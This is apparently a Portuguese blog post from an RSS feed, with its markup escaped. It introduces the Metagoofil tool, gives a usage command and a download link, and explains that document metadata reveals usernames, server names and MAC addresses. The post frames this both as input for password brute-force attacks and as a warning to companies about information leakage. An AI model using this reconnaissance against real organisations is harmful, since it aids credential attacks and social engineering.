&lt;a href=&quot;http://www.edge-security.com/metagoofil/metagoofil-process.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;235&quot; src=&quot;http://www.edge-security.com/metagoofil/metagoofil-process.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;Metagoofil&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;é uma ferramenta para&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;extração de metadados&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;de documentos públicos&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;(pdf,&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;doc,&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;xls&lt;/span&gt;, ppt, etc) &lt;span class=&quot;hps&quot;&gt;disponiveis&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;nos&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;websites.Estas&lt;/span&gt; informações &lt;span class=&quot;hps&quot;&gt;poderia ser útil&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;porque você pode obter&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;nomes de usuários&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;válidos,&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;ou nomes de&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;pessoas,&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;para usar&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;mais tarde&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;em ataques&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;bruteforce&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;senha&lt;/span&gt; &lt;span class=&quot;hps atn&quot;&gt;(&lt;/span&gt;vpn, ftp, &lt;span class=&quot;hps&quot;&gt;webapps&lt;/span&gt;), a ferramenta &lt;span class=&quot;hps&quot;&gt;também extrai&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;interessante&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;&quot;caminhos&quot;&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;dos documentos,&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;onde podemos obter&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;recursos&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;compartilhados&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;nomes&lt;/span&gt;, nomes de servidores, etc&lt;br /&gt;&lt;br /&gt; &lt;span class=&quot;hps&quot;&gt;Esta versão&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;extrai o endereço&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;MAC&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;da máquina onde&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;o documento foi criado&lt;/span&gt;. &lt;span class=&quot;hps atn&quot;&gt;(&lt;/span&gt;Apenas &lt;span class=&quot;hps&quot;&gt;para os documentos&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;do Microsoft Office)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; &lt;span class=&quot;hps&quot;&gt;Toda esta informação&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;não deve&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;estar disponível&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;na net,&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;mas a maioria&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;das empresas&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;não tem&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;políticas sobre o&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;vazamento&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;de informações&lt;/span&gt;,&lt;span class=&quot;hps&quot;&gt;e a maioria deles&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;não sabe&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;essa informação&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;existe.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; &lt;span class=&quot;hps&quot;&gt;Assim você&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;pode mostrar&lt;/span&gt;-lhes o que &lt;span class=&quot;hps&quot;&gt;um atacante pode&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;obter&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;de uma forma simples&lt;/span&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Usando:&lt;br /&gt;
&lt;br /&gt;
#python metagoofil.py -d site.com -l 100 -f doc -o saida.html -t arquivos&lt;br /&gt;
&lt;br /&gt;
-d &amp;gt; Domínio para a pesquisa dos arquivos&lt;br /&gt;
-l &amp;gt; Limite dos resultados (No máximo ate 100)&lt;br /&gt;
-f &amp;gt;Tipo de arquivo para baixar (all,pdf,doc,xls,ppt,odp,ods, etc)&lt;br /&gt;
-o &amp;gt; entrada de arquivo no formato html&lt;br /&gt;
-t &amp;gt; diretório para serem armazenados os arquivos baixados
   
  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;&lt;/span&gt;&lt;/span&gt;Portanto tenham cuidado com os documentos que você posta na internet, 
eles podem revelar muitas informações que podem ser utilizadas por 
atacantes e facilitar a vida deles&lt;br /&gt;
- Fornecendo usuários de sua rede,&lt;br /&gt;
- Fornecendo informações sobre os hosts que podem ser vítimas de ataque,&lt;br /&gt;
- Ajudando a colher dados durante o inicio de um ataque que podem ser utilizados para engenharia social.&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;http://www.edge-security.com/soft/metagoofil-1.4b.tar&quot;&gt;&lt;b&gt;Download: Metagoofil 1.4b&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;</description><link>http://max-sec.blogspot.com/2011/12/usando-o-metagoofil-para-extrair.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item></channel></rss>